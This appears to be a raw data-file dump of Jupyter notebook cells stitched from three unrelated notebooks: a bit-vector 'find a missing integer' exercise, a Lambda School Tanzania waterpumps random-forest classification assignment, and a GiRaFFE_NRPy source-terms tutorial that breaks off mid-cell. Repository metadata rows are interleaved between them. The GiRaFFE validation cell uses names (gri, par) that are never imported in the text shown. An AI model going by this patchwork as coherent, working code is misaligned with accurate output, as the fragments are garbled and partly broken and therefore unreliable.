"## Problem: Given an array of n integers, find an int not in the input. Use a minimal amount of memory.\n\n* [Constraints](#Constraints)\n* [Test Cases](#Test-Cases)\n* [Algorithm](#Algorithm)\n* [Code](#Code)\n* [Unit Test](#Unit-Test)",
"_____no_output_____"
],
[
"## Constraints\n\n* Are we working with non-negative ints?\n * Yes\n* What is the range of the integers?\n * Discuss the approach for 4 billion integers\n * Implement for 32 integers\n* Can we assume the inputs are valid?\n * No",
"_____no_output_____"
],
[
"## Test Cases\n\n* None -> Exception\n* [] -> Exception\n* General case\n * There is an int excluded from the input -> int\n * There isn't an int excluded from the input -> None",
"_____no_output_____"
],
[
"## Algorithm\n\nThe problem states to use a minimal amount of memory. We'll use a bit vector to keep track of the inputs.\n\nSay we are given 4 billion integers, which is 2^32 integers. The number of non-negative integers would be 2^31. With a bit vector, we'll need 4 billion bits to map each integer to a bit. Say we had only 1 GB of memory or 2^32 bytes. This would leave us with 8 billion bits.\n\nTo simplify this exercise, we'll work with an input of up to 32 ints that we'll map to a bit vector of 32 bits.\n\n<pre>\n\ninput = [0, 1, 2, 3, 4...28, 29, 31]\n\nbytes [ 1 ] [ 2 ] [ 3 ] [ 4 ]\nindex = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31\nbit_vector = 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1\n\nresult = 30\n\n* Loop through each item in the input, setting bit_vector[item] = True.\n* Loop through the bit_vector, return the first index where bit_vector[item] == False.\n\n</pre>\n\nComplexity:\n* Time: O(b), where b is the number of bits\n* Space: O(b)",
"_____no_output_____"
],
[
"## Code",
"_____no_output_____"
]
],
[
[
"from bitstring import BitArray # Run pip install bitstring\n\n\nclass Bits(object):\n\n def new_int(self, array, max_size):\n if not array:\n raise TypeError('array cannot be None or empty')\n bit_vector = BitArray(max_size)\n for item in array:\n bit_vector[item] = True\n for index, item in enumerate(bit_vector):\n if not item:\n return index\n return None",
"_____no_output_____"
]
],
[
[
"## Unit Test",
"_____no_output_____"
]
],
[
[
"# %%writefile test_new_int.py\nfrom nose.tools import assert_equal, assert_raises\n\n\nclass TestBits(object):\n\n def test_new_int(self):\n bits = Bits()\n max_size = 32\n assert_raises(TypeError, bits.new_int, None, max_size)\n assert_raises(TypeError, bits.new_int, [], max_size)\n data = [item for item in range(30)]\n data.append(31)\n assert_equal(bits.new_int(data, max_size), 30)\n data = [item for item in range(32)]\n assert_equal(bits.new_int(data, max_size), None)\n print('Success: test_find_int_excluded_from_input')\n\n\ndef main():\n test = TestBits()\n test.test_new_int()\n\n\nif __name__ == '__main__':\n main()",
"Success: test_find_int_excluded_from_input\n"
],
[
"%run -i test_new_int.py",
"Success: test_find_int_excluded_from_input\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb513860969d137c9bfaa801f0277b8a95cc82d1 | 41,889 | ipynb | Jupyter Notebook | module4-classification-metrics/LS_DS_224_assignment.ipynb | alex-pakalniskis/DS-Unit-2-Kaggle-Challenge | a41ed75e87f78b6d53658ea0f133595c72fd7a8c | [
"MIT"
] | null | null | null | module4-classification-metrics/LS_DS_224_assignment.ipynb | alex-pakalniskis/DS-Unit-2-Kaggle-Challenge | a41ed75e87f78b6d53658ea0f133595c72fd7a8c | [
"MIT"
] | null | null | null | module4-classification-metrics/LS_DS_224_assignment.ipynb | alex-pakalniskis/DS-Unit-2-Kaggle-Challenge | a41ed75e87f78b6d53658ea0f133595c72fd7a8c | [
"MIT"
] | null | null | null | 63.372163 | 20,552 | 0.750173 | [
[
[
"Lambda School Data Science\n\n*Unit 2, Sprint 2, Module 4*\n\n---",
"_____no_output_____"
],
[
"# Classification Metrics\n\n## Assignment\n- [ ] If you haven't yet, [review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.\n- [ ] Plot a confusion matrix for your Tanzania Waterpumps model.\n- [ ] Continue to participate in our Kaggle challenge. Every student should have made at least one submission that scores at least 70% accuracy (well above the majority class baseline).\n- [ ] Submit your final predictions to our Kaggle competition. Optionally, go to **My Submissions**, and _\"you may select up to 1 submission to be used to count towards your final leaderboard score.\"_\n- [ ] Commit your notebook to your fork of the GitHub repo.\n- [ ] Read [Maximizing Scarce Maintenance Resources with Data: Applying predictive modeling, precision at k, and clustering to optimize impact](https://towardsdatascience.com/maximizing-scarce-maintenance-resources-with-data-8f3491133050), by Lambda DS3 student Michael Brady. His blog post extends the Tanzania Waterpumps scenario, far beyond what's in the lecture notebook.\n\n\n## Stretch Goals\n\n### Reading\n\n- [Attacking discrimination with smarter machine learning](https://research.google.com/bigpicture/attacking-discrimination-in-ml/), by Google Research, with interactive visualizations. _\"A threshold classifier essentially makes a yes/no decision, putting things in one category or another. We look at how these classifiers work, ways they can potentially be unfair, and how you might turn an unfair classifier into a fairer one. As an illustrative example, we focus on loan granting scenarios where a bank may grant or deny a loan based on a single, automatically computed number such as a credit score.\"_\n- [Notebook about how to calculate expected value from a confusion matrix by treating it as a cost-benefit matrix](https://github.com/podopie/DAT18NYC/blob/master/classes/13-expected_value_cost_benefit_analysis.ipynb)\n- [Visualizing Machine Learning Thresholds to Make Better Business Decisions](https://blog.insightdatascience.com/visualizing-machine-learning-thresholds-to-make-better-business-decisions-4ab07f823415)\n\n\n### Doing\n- [ ] Share visualizations in our Slack channel!\n- [ ] RandomizedSearchCV / GridSearchCV, for model selection. (See module 3 assignment notebook)\n- [ ] Stacking Ensemble. (See module 3 assignment notebook)\n- [ ] More Categorical Encoding. (See module 2 assignment notebook)",
"_____no_output_____"
]
],
[
[
"%%capture\nimport sys\n\n# If you're on Colab:\nif 'google.colab' in sys.modules:\n DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'\n !pip install category_encoders==2.*\n\n# If you're working locally:\nelse:\n DATA_PATH = '../data/'",
"_____no_output_____"
],
[
"import pandas as pd\nimport geopandas as gpd\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Merge train_features.csv & train_labels.csv\ntrain = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'), \n pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))\n\n# Read test_features.csv & sample_submission.csv\ntest = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')\nsample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')",
"_____no_output_____"
],
[
"train_wards = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/train_wards.csv\")\ntest_wards = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/test_wards.csv\")\n\ntrain_elev = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/train_srtm_elevation.csv\")\ntest_elev = pd.read_csv(\"/home/alex/data/tanzania-pumps-rasterstats/test_srtm_elevation.csv\")",
"_____no_output_____"
],
[
"train_merged = train.merge(train_wards, on=\"id\").merge(train_elev, on=\"id\")\ntest_merged = test.merge(test_wards, on=\"id\").merge(test_elev, on=\"id\")",
"_____no_output_____"
],
[
"train_merged.columns",
"_____no_output_____"
],
[
"def clean_columns(df):\n dataframe = df.copy()\n dataframe.rename(columns={\"longitude_x\":\"longitude\",\"latitude_x\":\"latitude\"}, inplace=True)\n dataframe.drop([\"Unnamed: 0_x\",\"Unnamed: 0_y\",\"latitude_y\",\"longitude_y\",\"gps_height\"], axis=1, inplace=True)\n return dataframe\n \n ",
"_____no_output_____"
],
[
"train_clean = clean_columns(train_merged)\ntest_clean = clean_columns(test_merged)",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split\n",
"_____no_output_____"
],
[
"train_clean, validate_clean = train_test_split(\n train_clean, \n train_size=0.80, \n test_size=0.20, \n stratify=train['status_group'], \n random_state=42)",
"_____no_output_____"
],
[
"def wrangle(X):\n \"\"\"Wrangle train, validate, and test sets in the same way\"\"\"\n \n # Prevent SettingWithCopyWarning\n X = X.copy()\n \n # About 3% of the time, latitude has small values near zero,\n # outside Tanzania, so we'll treat these values like zero.\n X['latitude'] = X['latitude'].replace(-2e-08, 0)\n \n # When columns have zeros and shouldn't, they are like null values.\n # So we will replace the zeros with nulls, and impute missing values later.\n # Also create a \"missing indicator\" column, because the fact that\n # values are missing may be a predictive signal.\n cols_with_zeros = ['longitude', 'latitude', 'construction_year', \n 'gps_height', 'population']\n for col in cols_with_zeros:\n X[col] = X[col].replace(0, np.nan)\n X[col+'_MISSING'] = X[col].isnull()\n \n # Drop duplicate columns\n duplicates = ['quantity_group', 'payment_type']\n X = X.drop(columns=duplicates)\n \n # Drop recorded_by (never varies) and id (always varies, random)\n unusable_variance = ['recorded_by', 'id']\n X = X.drop(columns=unusable_variance)\n \n # Convert date_recorded to datetime\n X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)\n \n # Extract components from date_recorded, then drop the original column\n X['year_recorded'] = X['date_recorded'].dt.year\n X['month_recorded'] = X['date_recorded'].dt.month\n X['day_recorded'] = X['date_recorded'].dt.day\n X = X.drop(columns='date_recorded')\n \n # Engineer feature: how many years from construction_year to date_recorded\n X['years'] = X['year_recorded'] - X['construction_year']\n X['years_MISSING'] = X['years'].isnull()\n \n \n # return the wrangled dataframe\n return X",
"_____no_output_____"
],
[
"# The status_group column is the target\ntarget = 'status_group'\n\n# Get a dataframe with all train columns except the target\ntrain_features = train_clean.drop(columns=[target])\n\n# Get a list of the numeric features\nnumeric_features = train_features.select_dtypes(include='number').columns.tolist()\n\n# Get a series with the cardinality of the nonnumeric features\ncardinality = train_features.select_dtypes(exclude='number').nunique()\n\n# Get a list of all categorical features\ncategorical_features = cardinality.index.tolist()\n\n# Combine the lists \nfeatures = numeric_features + categorical_features",
"_____no_output_____"
],
[
"def reduce_cardinality_to_top_ten(feature, train, validate, test):\n \n # Get a list of the top 10 entries in feature of interest\n top10 = train[feature].value_counts()[:10].index\n \n train = train.copy()\n validate = validate.copy()\n test = test.copy()\n \n # At locations where the feature entry is NOT in the top 10,\n # replace the entry with 'OTHER'\n train.loc[~train[feature].isin(top10), feature] = 'OTHER'\n validate.loc[~validate[feature].isin(top10), feature] = 'OTHER'\n test.loc[~test[feature].isin(top10), feature] = 'OTHER'\n \n return train, validate, test",
"_____no_output_____"
],
[
"categorical_features_with_more_than_ten_categories = []\nfor feature in categorical_features:\n if len(train_clean[feature].unique()) > 10:\n categorical_features_with_more_than_ten_categories.append(feature)\n \ncategorical_features_with_more_than_ten_categories",
"_____no_output_____"
],
[
"for feature in categorical_features_with_more_than_ten_categories:\n train_clean, validate_clean, test_clean = reduce_cardinality_to_top_ten(feature, train_clean, validate_clean, test_clean)",
"_____no_output_____"
],
[
"X_train = train_clean[features]\nX_validate = validate_clean[features]\nX_test = test_clean[features]\n\ny_train = train_clean[target]\ny_validate = validate_clean[target]",
"_____no_output_____"
],
[
"import category_encoders as ce\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n",
"_____no_output_____"
],
[
"pipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(), \n RandomForestClassifier(random_state=8, max_depth=32, max_features= 0.668819157886731, min_samples_leaf=2, n_estimators=370, n_jobs=-1))\n \npipeline.fit(X_train, y_train)\n\nprint(pipeline.score(X_train, y_train))\nprint(pipeline.score(X_validate, y_validate))",
"0.9709595959595959\n0.8085016835016835\n"
],
[
"pipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(), \n RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370))\n \npipeline.fit(X_train, y_train)\n\nprint(pipeline.score(X_train, y_train))\nprint(pipeline.score(X_validate, y_validate))",
"0.931523569023569\n0.813973063973064\n"
],
[
"pipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(), \n RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370, max_depth=32)\n)\n \npipeline.fit(X_train, y_train)\n\nprint(pipeline.score(X_train, y_train))\nprint(pipeline.score(X_validate, y_validate))",
"0.9308712121212122\n0.8146464646464646\n"
],
[
"y_pred = pipeline.predict(X_test)\nsubmission = sample_submission.copy()\nsubmission['status_group'] = y_pred\nsubmission",
"_____no_output_____"
],
[
"submission.to_csv('/home/alex/code/DS-Unit-2-Kaggle-Challenge/module4-classification-metrics/alex-pakalniskis-kaggle-submission-day-4.1.csv', index=False)\n",
"_____no_output_____"
],
[
"from sklearn.metrics import plot_confusion_matrix\n\nplot_confusion_matrix(pipeline, X_validate, y_validate, values_format='.0f', xticks_rotation=\"vertical\")\n\nplt.show()",
"_____no_output_____"
],
[
"from sklearn.metrics import classification_report\ny_pred = pipeline.predict(X_validate)\nprint(classification_report(y_validate, y_pred))",
" precision recall f1-score support\n\n functional 0.80 0.92 0.85 6452\nfunctional needs repair 0.62 0.27 0.37 863\n non functional 0.86 0.78 0.82 4565\n\n accuracy 0.81 11880\n macro avg 0.76 0.65 0.68 11880\n weighted avg 0.81 0.81 0.80 11880\n\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb513ceaddc0ca4cd8e08c18ba3900e05c80aad3 | 20,239 | ipynb | Jupyter Notebook | in_progress/Tutorial-GiRaFFE_NRPy-Source_Terms.ipynb | fedelopezar/nrpytutorial | 753acd954be4a2f99639c9f9fd5e623689fc7493 | [
"BSD-2-Clause"
] | 1 | 2021-12-13T05:51:18.000Z | 2021-12-13T05:51:18.000Z | in_progress/Tutorial-GiRaFFE_NRPy-Source_Terms.ipynb | fedelopezar/nrpytutorial | 753acd954be4a2f99639c9f9fd5e623689fc7493 | [
"BSD-2-Clause"
] | null | null | null | in_progress/Tutorial-GiRaFFE_NRPy-Source_Terms.ipynb | fedelopezar/nrpytutorial | 753acd954be4a2f99639c9f9fd5e623689fc7493 | [
"BSD-2-Clause"
] | null | null | null | 52.432642 | 439 | 0.575671 | [
[
[
"<script async src=\"https://www.googletagmanager.com/gtag/js?id=UA-59152712-8\"></script>\n<script>\n window.dataLayer = window.dataLayer || [];\n function gtag(){dataLayer.push(arguments);}\n gtag('js', new Date());\n\n gtag('config', 'UA-59152712-8');\n</script>\n\n# `GiRaFFE_NRPy`: Source Terms\n\n## Author: Patrick Nelson\n\n<a id='intro'></a>\n\n**Notebook Status:** <font color=green><b> Validated </b></font>\n\n**Validation Notes:** This code produces the expected results for generated functions.\n\n## This module presents the functionality of [GiRaFFE_NRPy_Source_Terms.py](../../edit/in_progress/GiRaFFE_NRPy/GiRaFFE_NRPy_Source_Terms.py).\n\n## Introduction: \nThis writes and documents the C code that `GiRaFFE_NRPy` uses to compute the source terms for the right-hand sides of the evolution equations for the unstaggered prescription.\n\nThe equations themselves are already coded up in other functions; however, for the $\\tilde{S}_i$ source term, we will need derivatives of the metric. It will be most efficient and accurate to take them using the interpolated metric values that we will have calculated anyway; however, we will need to write our derivatives in a nonstandard way within NRPy+ in order to take advantage of this, writing our own code for memory access.",
"_____no_output_____"
],
[
"<a id='toc'></a>\n\n# Table of Contents\n$$\\label{toc}$$\n\nThis notebook is organized as follows\n\n1. [Step 1](#stilde_source): The $\\tilde{S}_i$ source term\n1. [Step 2](#code_validation): Code Validation against original C code\n1. [Step 3](#latex_pdf_output): Output this notebook to $\\LaTeX$-formatted PDF file",
"_____no_output_____"
]
],
[
[
"# Step 0: Add NRPy's directory to the path\n# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory\nimport os,sys\nnrpy_dir_path = os.path.join(\"..\")\nif nrpy_dir_path not in sys.path:\n sys.path.append(nrpy_dir_path)\n\nimport cmdline_helper as cmd\noutdir = os.path.join(\"GiRaFFE_NRPy\",\"GiRaFFE_Ccode_validation\",\"RHSs\")\ncmd.mkdir(outdir)",
"_____no_output_____"
]
],
[
[
"<a id='stilde_source'></a>\n\n## Step 1: The $\\tilde{S}_i$ source term \\[Back to [top](#toc)\\]\n$$\\label{stilde_source}$$\n\nWe start in the usual way - import the modules we need. We will also import the Levi-Civita symbol from `indexedexp.py` and use it to set the Levi-Civita tensor $\\epsilon^{ijk} = [ijk]/\\sqrt{\\gamma}$.",
"_____no_output_____"
]
],
[
[
"# Step 1: The StildeD RHS *source* term\nfrom outputC import outputC, outCfunction # NRPy+: Core C code output module\nimport indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support\nimport GRHD.equations as GRHD # NRPy+: Generate general relativistic hydrodynamics equations\nimport GRFFE.equations as GRFFE # NRPy+: Generate general relativistic force-free electrodynamics equations\n\nthismodule = \"GiRaFFE_NRPy_Source_Terms\"\n\ndef generate_memory_access_code(gammaDD,betaU,alpha):\n # There are several pieces of C code that we will write ourselves because we need to do things\n # a little bit outside of what NRPy+ is built for.\n # First, we will write general memory access. We will read in values from memory at a given point\n # for each quantity we care about.\n global general_access\n general_access = \"\"\n for var in [\"GAMMADD00\", \"GAMMADD01\", \"GAMMADD02\",\n \"GAMMADD11\", \"GAMMADD12\", \"GAMMADD22\",\n \"BETAU0\", \"BETAU1\", \"BETAU2\",\"ALPHA\",\n \"BU0\",\"BU1\",\"BU2\",\n \"VALENCIAVU0\",\"VALENCIAVU1\",\"VALENCIAVU2\"]:\n lhsvar = var.lower().replace(\"dd\",\"DD\").replace(\"u\",\"U\").replace(\"bU\",\"BU\").replace(\"valencia\",\"Valencia\")\n # e.g.,\n # const REAL gammaDD00dD0 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];\n general_access += \"const REAL \"+lhsvar+\" = auxevol_gfs[IDX4S(\"+var+\"GF,i0,i1,i2)];\\n\"\n\n # This quick function returns a nearby point for memory access. We need this because derivatives are not local operations.\n def idxp1(dirn):\n if dirn==0:\n return \"i0+1,i1,i2\"\n if dirn==1:\n return \"i0,i1+1,i2\"\n if dirn==2:\n return \"i0,i1,i2+1\"\n\n # Next we evaluate needed derivatives of the metric, based on their values at cell faces\n global metric_deriv_access\n metric_deriv_access = []\n# for dirn in range(3):\n# metric_deriv_access.append(\"\")\n# for var in [\"GAMMA_FACEDDdD00\", \"GAMMA_FACEDDdD01\", \"GAMMA_FACEDDdD02\",\n# \"GAMMA_FACEDDdD11\", \"GAMMA_FACEDDdD12\", \"GAMMA_FACEDDdD22\",\n# \"BETA_FACEUdD0\", \"BETA_FACEUdD1\", \"BETA_FACEUdD2\",\"ALPHA_FACEdD\"]:\n# lhsvar = var.lower().replace(\"dddd\",\"DDdD\").replace(\"udd\",\"UdD\").replace(\"dd\",\"dD\").replace(\"u\",\"U\").replace(\"_face\",\"\")\n# rhsvar = var.replace(\"dD\",\"\")\n# # e.g.,\n# # const REAL gammaDDdD000 = (auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)]-auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)])/dxx0;\n# metric_deriv_access[dirn] += \"const REAL \"+lhsvar+str(dirn)+\" = (auxevol_gfs[IDX4S(\"+rhsvar+\"GF,\"+idxp1(dirn)+\")]-auxevol_gfs[IDX4S(\"+rhsvar+\"GF,i0,i1,i2)])/dxx\"+str(dirn)+\";\\n\"\n# metric_deriv_access[dirn] += \"REAL Stilde_rhsD\"+str(dirn)+\";\\n\"\n # For this workaround, instead of taking the derivative of the metric components and then building the\n # four-metric, we build the four-metric and then take derivatives. 
Do this at i and i+1\n for dirn in range(3):\n metric_deriv_access.append(\"\")\n for var in [\"GAMMA_FACEDD00\", \"GAMMA_FACEDD01\", \"GAMMA_FACEDD02\",\n \"GAMMA_FACEDD11\", \"GAMMA_FACEDD12\", \"GAMMA_FACEDD22\",\n \"BETA_FACEU0\", \"BETA_FACEU1\", \"BETA_FACEU2\",\"ALPHA_FACE\"]:\n lhsvar = var.lower().replace(\"dd\",\"DD\").replace(\"u\",\"U\")\n rhsvar = var\n # e.g.,\n # const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];\n metric_deriv_access[dirn] += \"const REAL \"+lhsvar+\" = auxevol_gfs[IDX4S(\"+rhsvar+\"GF,i0,i1,i2)];\\n\"\n # Read in at the next grid point\n for var in [\"GAMMA_FACEDD00\", \"GAMMA_FACEDD01\", \"GAMMA_FACEDD02\",\n \"GAMMA_FACEDD11\", \"GAMMA_FACEDD12\", \"GAMMA_FACEDD22\",\n \"BETA_FACEU0\", \"BETA_FACEU1\", \"BETA_FACEU2\",\"ALPHA_FACE\"]:\n lhsvar = var.lower().replace(\"dd\",\"DD\").replace(\"u\",\"U\").replace(\"_face\",\"_facep1\")\n rhsvar = var\n # e.g.,\n # const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)];\n metric_deriv_access[dirn] += \"const REAL \"+lhsvar+\" = auxevol_gfs[IDX4S(\"+rhsvar+\"GF,\"+idxp1(dirn)+\")];\\n\"\n metric_deriv_access[dirn] += \"REAL Stilde_rhsD\"+str(dirn)+\";\\n\"\n import BSSN.ADMBSSN_tofrom_4metric as AB4m\n AB4m.g4DD_ito_BSSN_or_ADM(\"ADM\",gammaDD,betaU,alpha)\n four_metric_vars = [\n AB4m.g4DD[0][0],\n AB4m.g4DD[0][1],\n AB4m.g4DD[0][2],\n AB4m.g4DD[0][3],\n AB4m.g4DD[1][1],\n AB4m.g4DD[1][2],\n AB4m.g4DD[1][3],\n AB4m.g4DD[2][2],\n AB4m.g4DD[2][3],\n AB4m.g4DD[3][3]\n ]\n four_metric_names = [\n \"g4DD00\",\n \"g4DD01\",\n \"g4DD02\",\n \"g4DD03\",\n \"g4DD11\",\n \"g4DD12\",\n \"g4DD13\",\n \"g4DD22\",\n \"g4DD23\",\n \"g4DD33\"\n ]\n global four_metric_C, four_metric_Cp1\n four_metric_C = outputC(four_metric_vars,four_metric_names,\"returnstring\",params=\"outCverbose=False,CSE_sorting=none\")\n for ii in range(len(four_metric_names)):\n four_metric_names[ii] += \"p1\"\n four_metric_Cp1 = outputC(four_metric_vars,four_metric_names,\"returnstring\",params=\"outCverbose=False,CSE_sorting=none\")\n four_metric_C = four_metric_C.replace(\"gamma\",\"gamma_face\").replace(\"beta\",\"beta_face\").replace(\"alpha\",\"alpha_face\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\"g4\",\"const REAL g4\").replace(\"tmp_\",\"tmp_deriv\")\n four_metric_Cp1 = four_metric_Cp1.replace(\"gamma\",\"gamma_facep1\").replace(\"beta\",\"beta_facep1\").replace(\"alpha\",\"alpha_facep1\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\"g4\",\"const REAL g4\").replace(\"tmp_\",\"tmp_derivp\")\n\n global four_metric_deriv\n four_metric_deriv = []\n for dirn in range(3):\n four_metric_deriv.append(\"\")\n for var in [\"g4DDdD00\", \"g4DDdD01\", \"g4DDdD02\", \"g4DDdD03\", \"g4DDdD11\",\n \"g4DDdD12\", \"g4DDdD13\", \"g4DDdD22\", \"g4DDdD23\", \"g4DDdD33\"]:\n lhsvar = var + str(dirn+1)\n rhsvar = var.replace(\"dD\",\"\")\n rhsvarp1 = rhsvar + \"p1\"\n # e.g.,\n # const REAL g44DDdD000 = (g4DD00p1 - g4DD00)/dxx0;\n four_metric_deriv[dirn] += \"const REAL \"+lhsvar+\" = (\"+rhsvarp1+\" - \"+rhsvar+\")/dxx\"+str(dirn)+\";\\n\"\n\n # This creates the C code that writes to the Stilde_rhs direction specified.\n global write_final_quantity\n write_final_quantity = []\n for dirn in range(3):\n write_final_quantity.append(\"\")\n write_final_quantity[dirn] += \"rhs_gfs[IDX4S(STILDED\"+str(dirn)+\"GF,i0,i1,i2)] += Stilde_rhsD\"+str(dirn)+\";\"\n\ndef write_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi):\n generate_memory_access_code(gammaDD,betaU,alpha)\n # 
First, we declare some dummy tensors that we will use for the codegen.\n gammaDDdD = ixp.declarerank3(\"gammaDDdD\",\"sym01\",DIM=3)\n betaUdD = ixp.declarerank2(\"betaUdD\",\"nosym\",DIM=3)\n alphadD = ixp.declarerank1(\"alphadD\",DIM=3)\n g4DDdD = ixp.declarerank3(\"g4DDdD\",\"sym01\",DIM=4)\n\n # We need to rerun a few of these functions with the reset lists to make sure these functions\n # don't cheat by using analytic expressions\n GRHD.compute_sqrtgammaDET(gammaDD)\n GRHD.u4U_in_terms_of_ValenciavU__rescale_ValenciavU_by_applying_speed_limit(alpha, betaU, gammaDD, ValenciavU)\n GRFFE.compute_smallb4U(gammaDD, betaU, alpha, GRHD.u4U_ito_ValenciavU, BU, sqrt4pi)\n GRFFE.compute_smallbsquared(gammaDD, betaU, alpha, GRFFE.smallb4U)\n GRFFE.compute_TEM4UU(gammaDD,betaU,alpha, GRFFE.smallb4U, GRFFE.smallbsquared,GRHD.u4U_ito_ValenciavU)\n# GRHD.compute_g4DD_zerotimederiv_dD(gammaDD,betaU,alpha, gammaDDdD,betaUdD,alphadD)\n GRHD.compute_S_tilde_source_termD(alpha, GRHD.sqrtgammaDET,g4DDdD, GRFFE.TEM4UU)\n for i in range(3):\n desc = \"Adds the source term to StildeD\"+str(i)+\".\"\n name = \"calculate_StildeD\"+str(i)+\"_source_term\"\n outCfunction(\n outfile = os.path.join(outdir,name+\".h\"), desc=desc, name=name,\n params =\"const paramstruct *params,const REAL *auxevol_gfs, REAL *rhs_gfs\",\n body = general_access \\\n +metric_deriv_access[i]\\\n +four_metric_C\\\n +four_metric_Cp1\\\n +four_metric_deriv[i]\\\n +outputC(GRHD.S_tilde_source_termD[i],\"Stilde_rhsD\"+str(i),\"returnstring\",params=outCparams).replace(\"IDX4\",\"IDX4S\")\\\n +write_final_quantity[i],\n loopopts =\"InteriorPoints\",\n rel_path_to_Cparams=os.path.join(\"../\"))\n",
"_____no_output_____"
]
],
[
[
"<a id='code_validation'></a>\n\n# Step 2: Code Validation against original C code \\[Back to [top](#toc)\\]\n$$\\label{code_validation}$$\n\nTo validate the code in this tutorial we check for agreement between the files\n\n1. that were written in this tutorial and\n1. those that are stored in `GiRaFFE_NRPy/GiRaFFE_Ccode_library` or generated by `GiRaFFE_NRPy_A2B.py`\n",
"_____no_output_____"
]
],
[
[
"# Declare gridfunctions necessary to generate the C code:\ngammaDD = ixp.register_gridfunctions_for_single_rank2(\"AUXEVOL\",\"gammaDD\",\"sym01\",DIM=3)\nbetaU = ixp.register_gridfunctions_for_single_rank1(\"AUXEVOL\",\"betaU\",DIM=3)\nalpha = gri.register_gridfunctions(\"AUXEVOL\",\"alpha\",DIM=3)\nBU = ixp.register_gridfunctions_for_single_rank1(\"AUXEVOL\",\"BU\",DIM=3)\nValenciavU = ixp.register_gridfunctions_for_single_rank1(\"AUXEVOL\",\"ValenciavU\",DIM=3)\nStildeD = ixp.register_gridfunctions_for_single_rank1(\"EVOL\",\"StildeD\",DIM=3)\n# Declare this symbol:\nsqrt4pi = par.Cparameters(\"REAL\",thismodule,\"sqrt4pi\",\"sqrt(4.0*M_PI)\")\n\n# First, we generate the file using the functions written in this notebook:\noutCparams = \"outCverbose=False\"\nwrite_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)\n\n# Define the directory that we wish to validate against:\nvaldir = os.path.join(\"GiRaFFE_NRPy\",\"GiRaFFE_Ccode_library\",\"RHSs\")\ncmd.mkdir(valdir)\n\nimport GiRaFFE_NRPy.GiRaFFE_NRPy_Source_Terms as source\nsource.write_out_functions_for_StildeD_source_term(valdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)\n\nimport difflib\nimport sys\n\nprint(\"Printing difference between original C code and this code...\")\n# Open the files to compare\nfiles = [\"calculate_StildeD0_source_term.h\",\"calculate_StildeD1_source_term.h\",\"calculate_StildeD2_source_term.h\"]\n\nfor file in files:\n print(\"Checking file \" + file)\n with open(os.path.join(valdir,file)) as file1, open(os.path.join(outdir,file)) as file2:\n # Read the lines of each file\n file1_lines = file1.readlines()\n file2_lines = file2.readlines()\n num_diffs = 0\n for line in difflib.unified_diff(file1_lines, file2_lines, fromfile=os.path.join(valdir+file), tofile=os.path.join(outdir+file)):\n sys.stdout.writelines(line)\n num_diffs = num_diffs + 1\n if num_diffs == 0:\n print(\"No difference. TEST PASSED!\")\n else:\n print(\"ERROR: Disagreement found with .py file. See differences above.\")\n sys.exit(1)",
